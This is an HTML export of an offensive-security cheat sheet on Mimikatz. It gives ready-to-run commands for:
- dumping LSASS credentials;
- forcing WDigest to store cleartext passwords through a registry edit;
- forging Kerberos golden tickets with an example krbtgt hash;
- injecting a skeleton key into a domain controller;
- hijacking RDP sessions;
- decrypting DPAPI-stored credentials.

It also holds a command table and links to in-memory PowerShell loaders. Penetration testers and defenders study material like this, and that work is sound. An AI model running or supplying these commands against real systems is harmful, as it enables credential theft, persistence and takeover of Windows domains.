<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>Windows - Mimikatz</title><style>
/* webkit printing magic: print all background colors */
html {
	-webkit-print-color-adjust: exact;
}
* {
	box-sizing: border-box;
	-webkit-print-color-adjust: exact;
}

html,
body {
	margin: 0;
	padding: 0;
}
@media only screen {
	body {
		margin: 2em auto;
		max-width: 900px;
		color: rgb(55, 53, 47);
	}
}

body {
	line-height: 1.5;
	white-space: pre-wrap;
}

a,
a.visited {
	color: inherit;
	text-decoration: underline;
}

.pdf-relative-link-path {
	font-size: 80%;
	color: #444;
}

h1,
h2,
h3 {
	letter-spacing: -0.01em;
	line-height: 1.2;
	font-weight: 600;
	margin-bottom: 0;
}

.page-title {
	font-size: 2.5rem;
	font-weight: 700;
	margin-top: 0;
	margin-bottom: 0.75em;
}

h1 {
	font-size: 1.875rem;
	margin-top: 1.875rem;
}

h2 {
	font-size: 1.5rem;
	margin-top: 1.5rem;
}

h3 {
	font-size: 1.25rem;
	margin-top: 1.25rem;
}

.source {
	border: 1px solid #ddd;
	border-radius: 3px;
	padding: 1.5em;
	word-break: break-all;
}

.callout {
	border-radius: 3px;
	padding: 1rem;
}

figure {
	margin: 1.25em 0;
	page-break-inside: avoid;
}

figcaption {
	opacity: 0.5;
	font-size: 85%;
	margin-top: 0.5em;
}

mark {
	background-color: transparent;
}

.indented {
	padding-left: 1.5em;
}

hr {
	background: transparent;
	display: block;
	width: 100%;
	height: 1px;
	visibility: visible;
	border: none;
	border-bottom: 1px solid rgba(55, 53, 47, 0.09);
}

img {
	max-width: 100%;
}

@media only print {
	img {
		max-height: 100vh;
		object-fit: contain;
	}
}

@page {
	margin: 1in;
}

.collection-content {
	font-size: 0.875rem;
}

.column-list {
	display: flex;
	justify-content: space-between;
}

.column {
	padding: 0 1em;
}

.column:first-child {
	padding-left: 0;
}

.column:last-child {
	padding-right: 0;
}

.table_of_contents-item {
	display: block;
	font-size: 0.875rem;
	line-height: 1.3;
	padding: 0.125rem;
}

.table_of_contents-indent-1 {
	margin-left: 1.5rem;
}

.table_of_contents-indent-2 {
	margin-left: 3rem;
}

.table_of_contents-indent-3 {
	margin-left: 4.5rem;
}

.table_of_contents-link {
	text-decoration: none;
	opacity: 0.7;
	border-bottom: 1px solid rgba(55, 53, 47, 0.18);
}

table,
th,
td {
	border: 1px solid rgba(55, 53, 47, 0.09);
	border-collapse: collapse;
}

table {
	border-left: none;
	border-right: none;
}

th,
td {
	font-weight: normal;
	padding: 0.25em 0.5em;
	line-height: 1.5;
	min-height: 1.5em;
	text-align: left;
}

th {
	color: rgba(55, 53, 47, 0.6);
}

ol,
ul {
	margin: 0;
	margin-block-start: 0.6em;
	margin-block-end: 0.6em;
}

li > ol:first-child,
li > ul:first-child {
	margin-block-start: 0.6em;
}

ul > li {
	list-style: disc;
}

ul.to-do-list {
	text-indent: -1.7em;
}

ul.to-do-list > li {
	list-style: none;
}

.to-do-children-checked {
	text-decoration: line-through;
	opacity: 0.375;
}

ul.toggle > li {
	list-style: none;
}

ul {
	padding-inline-start: 1.7em;
}

ul > li {
	padding-left: 0.1em;
}

ol {
	padding-inline-start: 1.6em;
}

ol > li {
	padding-left: 0.2em;
}

.mono ol {
	padding-inline-start: 2em;
}

.mono ol > li {
	text-indent: -0.4em;
}

.toggle {
	padding-inline-start: 0em;
	list-style-type: none;
}

/* Indent toggle children */
.toggle > li > details {
	padding-left: 1.7em;
}

.toggle > li > details > summary {
	margin-left: -1.1em;
}

.selected-value {
	display: inline-block;
	padding: 0 0.5em;
	background: rgba(206, 205, 202, 0.5);
	border-radius: 3px;
	margin-right: 0.5em;
	margin-top: 0.3em;
	margin-bottom: 0.3em;
	white-space: nowrap;
}

.collection-title {
	display: inline-block;
	margin-right: 1em;
}

time {
	opacity: 0.5;
}

.icon {
	display: inline-block;
	max-width: 1.2em;
	max-height: 1.2em;
	text-decoration: none;
	vertical-align: text-bottom;
	margin-right: 0.5em;
}

img.icon {
	border-radius: 3px;
}

.user-icon {
	width: 1.5em;
	height: 1.5em;
	border-radius: 100%;
	margin-right: 0.5rem;
}

.user-icon-inner {
	font-size: 0.8em;
}

.text-icon {
	border: 1px solid #000;
	text-align: center;
}

.page-cover-image {
	display: block;
	object-fit: cover;
	width: 100%;
	height: 30vh;
}

.page-header-icon {
	font-size: 3rem;
	margin-bottom: 1rem;
}

.page-header-icon-with-cover {
	margin-top: -0.72em;
	margin-left: 0.07em;
}

.page-header-icon img {
	border-radius: 3px;
}

.link-to-page {
	margin: 1em 0;
	padding: 0;
	border: none;
	font-weight: 500;
}

p > .user {
	opacity: 0.5;
}

td > .user,
td > time {
	white-space: nowrap;
}

input[type="checkbox"] {
	transform: scale(1.5);
	margin-right: 0.6em;
	vertical-align: middle;
}

p {
	margin-top: 0.5em;
	margin-bottom: 0.5em;
}

.image {
	border: none;
	margin: 1.5em 0;
	padding: 0;
	border-radius: 0;
	text-align: center;
}

.code,
code {
	background: rgba(135, 131, 120, 0.15);
	border-radius: 3px;
	padding: 0.2em 0.4em;
	border-radius: 3px;
	font-size: 85%;
	tab-size: 2;
}

code {
	color: #eb5757;
}

.code {
	padding: 1.5em 1em;
}

.code > code {
	background: none;
	padding: 0;
	font-size: 100%;
	color: inherit;
}

blockquote {
	font-size: 1.25em;
	margin: 1em 0;
	padding-left: 1em;
	border-left: 3px solid rgb(55, 53, 47);
}

.bookmark-href {
	font-size: 0.75em;
	opacity: 0.5;
}

.sans { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol"; }
.code { font-family: 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace; }
.serif { font-family: Lyon-Text, Georgia, KaiTi, STKaiTi, '华文楷体', KaiTi_GB2312, '楷体_GB2312', serif; }
.mono { font-family: Nitti, 'Microsoft YaHei', '微软雅黑', monospace; }
.pdf .sans { font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .code { font-family: Source Code Pro, 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.pdf .serif { font-family: PT Serif, Lyon-Text, Georgia, KaiTi, STKaiTi, '华文楷体', KaiTi_GB2312, '楷体_GB2312', serif, 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .mono { font-family: PT Mono, Nitti, 'Microsoft YaHei', '微软雅黑', monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.highlight-default {
}
.highlight-gray {
	color: rgb(155,154,151);
}
.highlight-brown {
	color: rgb(100,71,58);
}
.highlight-orange {
	color: rgb(217,115,13);
}
.highlight-yellow {
	color: rgb(223,171,1);
}
.highlight-teal {
	color: rgb(15,123,108);
}
.highlight-blue {
	color: rgb(11,110,153);
}
.highlight-purple {
	color: rgb(105,64,165);
}
.highlight-pink {
	color: rgb(173,26,114);
}
.highlight-red {
	color: rgb(224,62,62);
}
.highlight-gray_background {
	background: rgb(235,236,237);
}
.highlight-brown_background {
	background: rgb(233,229,227);
}
.highlight-orange_background {
	background: rgb(250,235,221);
}
.highlight-yellow_background {
	background: rgb(251,243,219);
}
.highlight-teal_background {
	background: rgb(221,237,234);
}
.highlight-blue_background {
	background: rgb(221,235,241);
}
.highlight-purple_background {
	background: rgb(234,228,242);
}
.highlight-pink_background {
	background: rgb(244,223,235);
}
.highlight-red_background {
	background: rgb(251,228,228);
}
.block-color-default {
	color: inherit;
	fill: inherit;
}
.block-color-gray {
	color: rgba(55, 53, 47, 0.6);
	fill: rgba(55, 53, 47, 0.6);
}
.block-color-brown {
	color: rgb(100,71,58);
	fill: rgb(100,71,58);
}
.block-color-orange {
	color: rgb(217,115,13);
	fill: rgb(217,115,13);
}
.block-color-yellow {
	color: rgb(223,171,1);
	fill: rgb(223,171,1);
}
.block-color-teal {
	color: rgb(15,123,108);
	fill: rgb(15,123,108);
}
.block-color-blue {
	color: rgb(11,110,153);
	fill: rgb(11,110,153);
}
.block-color-purple {
	color: rgb(105,64,165);
	fill: rgb(105,64,165);
}
.block-color-pink {
	color: rgb(173,26,114);
	fill: rgb(173,26,114);
}
.block-color-red {
	color: rgb(224,62,62);
	fill: rgb(224,62,62);
}
.block-color-gray_background {
	background: rgb(235,236,237);
}
.block-color-brown_background {
	background: rgb(233,229,227);
}
.block-color-orange_background {
	background: rgb(250,235,221);
}
.block-color-yellow_background {
	background: rgb(251,243,219);
}
.block-color-teal_background {
	background: rgb(221,237,234);
}
.block-color-blue_background {
	background: rgb(221,235,241);
}
.block-color-purple_background {
	background: rgb(234,228,242);
}
.block-color-pink_background {
	background: rgb(244,223,235);
}
.block-color-red_background {
	background: rgb(251,228,228);
}

.checkbox {
	display: inline-flex;
	vertical-align: text-bottom;
	width: 16;
	height: 16;
	background-size: 16px;
	margin-left: 2px;
	margin-right: 5px;
}

.checkbox-on {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20width%3D%2216%22%20height%3D%2216%22%20fill%3D%22%2358A9D7%22%2F%3E%0A%3Cpath%20d%3D%22M6.71429%2012.2852L14%204.9995L12.7143%203.71436L6.71429%209.71378L3.28571%206.2831L2%207.57092L6.71429%2012.2852Z%22%20fill%3D%22white%22%2F%3E%0A%3C%2Fsvg%3E");
}

.checkbox-off {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20x%3D%220.75%22%20y%3D%220.75%22%20width%3D%2214.5%22%20height%3D%2214.5%22%20fill%3D%22white%22%20stroke%3D%22%2336352F%22%20stroke-width%3D%221.5%22%2F%3E%0A%3C%2Fsvg%3E");
}
	
</style></head><body><article id="b09535cf-cf37-4477-87d8-d82c42afebee" class="page sans"><header><h1 class="page-title">Windows - Mimikatz</h1></header><div class="page-body"><h1 id="97431076-df3e-456e-ae99-4a5f9144cc14" class="">Windows - Mimikatz</h1><h2 id="1e9296cc-a281-4c03-9113-ce8a0eee39b5" class="">Summary</h2><ul id="f59086e3-d6f7-42e9-8b08-b239ef333509" class="bulleted-list"><li><a href="about:blank#">Mimikatz - Execute commands</a></li></ul><ul id="8a3b2972-a3f6-444d-89a7-c00edb053942" class="bulleted-list"><li><a href="about:blank#">Mimikatz - Extract passwords</a></li></ul><ul id="bcbc10ca-c988-4ac3-a037-2754c4ad487f" class="bulleted-list"><li><a href="about:blank#">Mimikatz - Mini Dump</a></li></ul><ul id="981539f3-4a84-41da-9482-75c092d25874" class="bulleted-list"><li><a href="about:blank#">Mimikatz - Golden ticket</a></li></ul><ul id="2e6b09dd-a6b8-41d4-92c2-cc629054e16b" class="bulleted-list"><li><a href="about:blank#">Mimikatz - Skeleton key</a></li></ul><ul id="b38de3da-697b-4ee8-9473-15d48ddf8902" class="bulleted-list"><li><a href="about:blank#">Mimikatz - RDP session takeover</a></li></ul><ul id="159a67a9-b55c-41c9-aab2-65b5cde8d350" class="bulleted-list"><li><a href="about:blank#">Mimikatz - Credential Manager &amp; DPAPI</a></li></ul><ul id="fd167183-64ff-4b87-8edf-9ff4eeda6ed7" class="bulleted-list"><li><a href="about:blank#">Mimikatz - Commands list</a></li></ul><ul id="4cbd3da3-a962-4fa9-9769-57d4f0000f5f" class="bulleted-list"><li><a href="about:blank#">Mimikatz - Powershell version</a></li></ul><ul id="3811534a-8f05-404a-8899-941310b4ce8e" class="bulleted-list"><li><a href="about:blank#references">References</a></li></ul><figure id="058f07cd-e031-4f52-bdf1-f7fafbacf35d" class="image"><a href="http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png"><img src="http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png"/></a></figure><p id="b6243fd9-c572-4943-8318-b989c5b8e901" class="">Data in memory</p><h2 id="c1cfc4bb-3285-46cc-9609-514e05affbcc" class="">Mimikatz - Execute commands</h2><p id="5b5fc396-22f2-4c5b-8df7-bc9db4605f2c" class="">Only one command</p><pre id="c2309759-de14-4cfa-9406-12fd5f7965c1" class="code"><code>PS C:\temp\mimikatz&gt; .\mimikatz &quot;privilege::debug&quot; &quot;sekurlsa::logonpasswords&quot; exit</code></pre><p id="4a6b75bd-f989-4625-83ce-5ab0be6e29bc" class="">Mimikatz console (multiple commands)</p><pre id="08493ddd-8c68-4726-9b55-204b1af9e686" class="code"><code>PS C:\temp\mimikatz&gt; .\mimikatzmimikatz # privilege::debugmimikatz # sekurlsa::logonpasswordsmimikatz # sekurlsa::wdigest</code></pre><h2 id="e8ccb884-8915-4766-b0e7-948503eacc3b" class="">Mimikatz - Extract passwords</h2><blockquote id="ee73d007-9c33-4f30-8882-702ef45b0037" class="">Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled.</blockquote><pre id="854b67e9-b3dd-4c05-8c2c-031fcd9aa191" class="code"><code>mimikatz_command -f sekurlsa::logonPasswords fullmimikatz_command -f sekurlsa::wdigest# to re-enable wdigest in Windows Server 2012+# in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest# create a DWORD &#x27;UseLogonCredential&#x27; with the value 1.reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1</code></pre><p id="0bd344af-3ca2-45e1-9573-67baf255eaae" class="">:warning: To take effect, conditions are required : - Win7 / 2008R2 / 8 / 2012 / 8.1 / 2012R2: * Adding requires lock * Removing requires signout - Win10: * Adding requires signout * Removing requires signout - Win2016: * Adding requires lock * Removing requires reboot</p><h2 id="2d83cb00-fdf4-4446-8f98-c411ff1ce85d" class="">Mimikatz - Mini Dump</h2><p id="759223c9-3d88-4fea-8cbe-c3c14d8bd14b" class="">Dump the lsass process.</p><pre id="a90ec4b8-640f-4c1b-8f98-96c4cad0c53e" class="code"><code>C:\procdump.exe -accepteula -ma lsass.exe lsass.dmpnet use Z: https://live.sysinternals.comZ:\procdump.exe -accepteula -ma lsass.exe lsass.dmp</code></pre><p id="b2c6794e-c1c8-4a21-a253-18a7e59ea5b3" class="">Then load it inside Mimikatz.</p><pre id="2f96392e-c8c2-4134-94b6-e0491dc40e5b" class="code"><code>mimikatz # sekurlsa::minidump lsass.dmpSwitch to minidumpmimikatz # sekurlsa::logonPasswords</code></pre><h2 id="26587b71-54d6-4fb2-b773-1a2de5aaa117" class="">Mimikatz - Golden ticket</h2><pre id="a1af5cc5-c2f1-42d9-952f-60f3c8e598e5" class="code"><code>.\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt</code></pre><pre id="6cd0adbd-42d9-4c8e-92fd-92f4f7efba1b" class="code"><code>.\mimikatz &quot;kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt&quot; exit</code></pre><h2 id="474255cf-9cff-4d3f-b57f-7661cfe7478a" class="">Mimikatz - Skeleton key</h2><pre id="b2bb5178-b26e-4b03-883b-de11de8a76ff" class="code"><code>privilege::debugmisc::skeleton# map the sharenet use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz# login as someonerdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab</code></pre><h2 id="7f7e0177-bca9-4e49-897a-76c71416795f" class="">Mimikatz - RDP session takeover</h2><p id="f6662043-648f-446b-ab3b-54147c962a7f" class="">Run tscon.exe as the SYSTEM user, you can connect to any session without a password.</p><pre id="999f418f-a474-4457-a5ef-8425f78410af" class="code"><code>privilege::debugtoken::elevatets::remote /id:2</code></pre><pre id="f49b3aea-714c-4dd4-9a8a-ec57d50c7b39" class="code"><code># get the Session ID you want to hijackquery usercreate sesshijack binpath= &quot;cmd.exe /k tscon 1 /dest:rdp-tcp#55&quot;net start sesshijack</code></pre><h2 id="b6b8813f-2556-4777-9eed-73a22bd4e73d" class="">Mimikatz - Credential Manager &amp; DPAPI</h2><pre id="5159e52c-3ad6-4447-9636-f6545f190984" class="code"><code># check the folder to find credentialsdir C:\Users\&lt;username&gt;\AppData\Local\Microsoft\Credentials\*# check the file with mimikatz$ mimikatz dpapi::cred /in:C:\Users\&lt;username&gt;\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0# find master key$ mimikatz !sekurlsa::dpapi# use master key$ mimikatz dpapi::cred /in:C:\Users\&lt;username&gt;\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b</code></pre><h2 id="e033b45a-91e7-4910-bf27-a12aa52fa5e5" class="">Mimikatz - Commands list</h2><div id="edeacb6d-5f61-49a3-b975-4741a13962a2" class="collection-content"><h4 class="collection-title"></h4><table class="collection-content"><thead><tr><th>Command</th><th>Definition</th></tr></thead><tbody><tr id="edf9209d-cbb5-47e6-814a-7df8f0fcb8d0"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/CRYPTO%20Certificates.html">CRYPTO::Certificates</a></td><td class="cell-H`.H">list/export certificates</td></tr><tr id="c907d8fc-7109-490c-8077-6ae2fa76fc37"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/CRYPTO%20Certificates%201.html">CRYPTO::Certificates</a></td><td class="cell-H`.H">list/export certificates</td></tr><tr id="8b4392a2-089d-4675-8225-b4771224e2cb"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/KERBEROS%20Golden.html">KERBEROS::Golden</a></td><td class="cell-H`.H">create golden/silver/trust tickets</td></tr><tr id="5ab6be7b-9de8-4ee0-9d3c-434ab1da8308"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/KERBEROS%20List.html">KERBEROS::List</a></td><td class="cell-H`.H">list all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.Similar to functionality of “klist”.</td></tr><tr id="ffa92d48-a0ea-42e3-abc2-4c5539864eef"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/KERBEROS%20PTT.html">KERBEROS::PTT</a></td><td class="cell-H`.H">pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust).</td></tr><tr id="84253d5f-20d4-45e3-baad-81b0166346a7"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/LSADUMP%20DCSync.html">LSADUMP::DCSync</a></td><td class="cell-H`.H">ask a DC to synchronize an object (get password data for account). No need to run code on DC.</td></tr><tr id="b2d165fe-eede-49b6-b96a-16a7c56ff17d"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/LSADUMP%20LSA.html">LSADUMP::LSA</a></td><td class="cell-H`.H">Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: “/name:krbtgt”</td></tr><tr id="cd93b337-9362-4408-ad1c-9a200044af24"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/LSADUMP%20SAM.html">LSADUMP::SAM</a></td><td class="cell-H`.H">get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer.</td></tr><tr id="52aab7a0-3097-4a0f-825b-ca4a40ed8f50"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/LSADUMP%20Trust.html">LSADUMP::Trust</a></td><td class="cell-H`.H">Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest).</td></tr><tr id="8e0537b1-3599-4751-a362-865ea0ead051"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/MISC%20AddSid.html">MISC::AddSid</a></td><td class="cell-H`.H">Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID). Moved to SID:modify as of May 6th, 2016.</td></tr><tr id="f0bab493-8af6-4914-8c70-7f255a59c00f"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/MISC%20MemSSP.html">MISC::MemSSP</a></td><td class="cell-H`.H">Inject a malicious Windows SSP to log locally authenticated credentials.</td></tr><tr id="3e4ea6a2-ce84-4117-9e64-b9d360454920"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/MISC%20Skeleton.html">MISC::Skeleton</a></td><td class="cell-H`.H">Inject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as their usual password.</td></tr><tr id="ebf41947-fe7e-4ba6-b95b-b9ca33b0d8ff"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/PRIVILEGE%20Debug.html">PRIVILEGE::Debug</a></td><td class="cell-H`.H">get debug rights (this or Local System rights is required for many Mimikatz commands).</td></tr><tr id="7c1b837c-a8dc-4356-8cb1-f783eac27769"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/SEKURLSA%20Ekeys.html">SEKURLSA::Ekeys</a></td><td class="cell-H`.H">list Kerberos encryption keys</td></tr><tr id="ac71bfe4-4082-4237-8e9e-a5c9b75301e7"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/SEKURLSA%20Kerberos.html">SEKURLSA::Kerberos</a></td><td class="cell-H`.H">List Kerberos credentials for all authenticated users (including services and computer account)</td></tr><tr id="09dc7882-593a-4209-a5d9-e40aad97b363"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/SEKURLSA%20Krbtgt.html">SEKURLSA::Krbtgt</a></td><td class="cell-H`.H">get Domain Kerberos service account (KRBTGT)password data</td></tr><tr id="c3577369-d795-4002-abea-c3912a571b71"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/SEKURLSA%20LogonPasswords.html">SEKURLSA::LogonPasswords</a></td><td class="cell-H`.H">lists all available provider credentials. This usually shows recently logged on user and computer credentials.</td></tr><tr id="56a74a8b-2560-430c-af00-eb772f568e5a"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/SEKURLSA%20Pth.html">SEKURLSA::Pth</a></td><td class="cell-H`.H">Pass- theHash and Over-Pass-the-Hash</td></tr><tr id="42bc9c31-2df1-4b0a-a3c1-ff712046c0c9"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/SEKURLSA%20Tickets.html">SEKURLSA::Tickets</a></td><td class="cell-H`.H">Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users).</td></tr><tr id="348638b1-ce57-43dc-8eeb-047b42ded92a"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/TOKEN%20List.html">TOKEN::List</a></td><td class="cell-H`.H">list all tokens of the system</td></tr><tr id="fa34c160-28e0-49ba-8f14-f24ae7d94d47"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/TOKEN%20Elevate.html">TOKEN::Elevate</a></td><td class="cell-H`.H">impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box</td></tr><tr id="c35211e0-26c6-420a-86b0-67dedb7d80ee"><td class="cell-title"><a href="Windows%20Mimikatz/Untitled%20Database/TOKEN%20Elevate%20domainadmin.html">TOKEN::Elevate /domainadmin</a></td><td class="cell-H`.H">impersonate a token with Domain Admin credentials.</td></tr></tbody></table></div><h2 id="baff5d44-ca8b-48d3-ba15-2dfb615a60c6" class="">Mimikatz - Powershell version</h2><p id="cf7787a5-c8eb-4e1f-8923-463dc59252a0" class="">Mimikatz in memory (no binary on disk) with :</p><ul id="46b91571-2233-4f33-ab3b-21185ebfe325" class="bulleted-list"><li><a href="https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1">Invoke-Mimikatz</a> from PowerShellEmpire</li></ul><ul id="98692c3e-35f5-432e-8003-6f060afc3326" class="bulleted-list"><li><a href="https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1">Invoke-Mimikatz</a> from PowerSploit</li></ul><p id="03969f50-f4d9-4e4f-bb69-70c43909c434" class="">More informations can be grabbed from the Memory with :</p><ul id="57b812ea-c11f-4601-84c7-2752f18feb41" class="bulleted-list"><li><a href="https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1">Invoke-Mimikittenz</a></li></ul><h2 id="6b5ac7af-73f3-45a6-bc93-bb908f8e3550" class="">References</h2><ul id="5ee54b70-614f-498c-9017-818c1fed2d3f" class="bulleted-list"><li><a href="https://adsecurity.org/?page_id=1821">Unofficial Guide to Mimikatz &amp; Command Reference</a></li></ul><ul id="6a959ada-4047-4e16-a1ab-fc37255a7de9" class="bulleted-list"><li><a href="https://pentestlab.blog/2018/04/10/skeleton-key/">Skeleton Key</a></li></ul><ul id="253a4a4e-5367-44f8-a2b0-2cac60386a7b" class="bulleted-list"><li><a href="https://www.adamcouch.co.uk/reversing-wdigest-configuration-in-windows-server-2012-r2-and-windows-server-2016/">Reversing Wdigest configuration in Windows Server 2012 R2 and Windows Server 2016 - 5TH DECEMBER 2017 - ACOUCH</a></li></ul></div></article></body></html>